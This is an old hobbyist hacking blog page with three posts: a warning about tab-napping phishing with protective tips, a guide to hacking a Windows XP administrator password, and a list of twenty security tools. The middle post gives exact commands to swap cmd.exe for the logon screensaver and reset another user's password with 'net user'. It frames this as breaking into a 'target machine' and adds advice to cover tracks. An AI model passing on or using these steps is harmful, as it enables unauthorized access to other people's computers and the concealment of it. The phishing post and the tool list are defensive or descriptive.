hacking

hacking is my passion, if u wanna do some thing interesting u can visit here

My Blog List

just click to see

Your Ad Here

ur ip address is

Sign by Danasoft - Get Your Free Sign

Saturday, October 23, 2010

Beware Of Tab Napping: New Phishing Technique

As people were becoming more and more aware of these traditional phishing techniques and it was becoming difficult for the scammers to cheat people using these phishing techniques so they invented a new technique called “Tab Napping”.This is one of the most intelligent and wise methods of phishing and it not easily detected by a normal internet user until and unless he is aware of this phishing technique.

                                    What is Tab Napping?

Tab napping is new type of phising scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowlege.For example one of your inactive tab in which you have opened your bank’s website will be automatically replaced with the phishing site of your bank and you will be asked to enter your username and password.You might think you have been signed out or never logged in but when you will enter the details again it will be sent to the scammer.

How To Detect And Protect Yourself From Tab Napping

Here are the simple and easy steps with which you can detect this new phishing technique “Tab Napping”.

1. Don’t open another tab when your are working with your banking site or any other secure businesswebsite instead open new windows using CTRL+N.
2. Always check the url address of the website if you return from another tab.(Fake page will have differentUrl)
3. Check that the url has secure address “https:// “ or a big green bar in front of the url in address bar which certifies that it is secure and certified website.
4. If you find anything suspicious close the tab and type and open the website in new Tab.

Saturday, October 16, 2010

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Monday, October 4, 2010

Top 20 Hacking Tools

These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name.

Nessus

The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal

Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat

Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol

TCPdump

TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping

Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff

DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap

>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire

Tripwire is a tool that can be used for data and program integrity assurance.

Kismet

Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf

OpenBSD Packet Filter

fport

fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.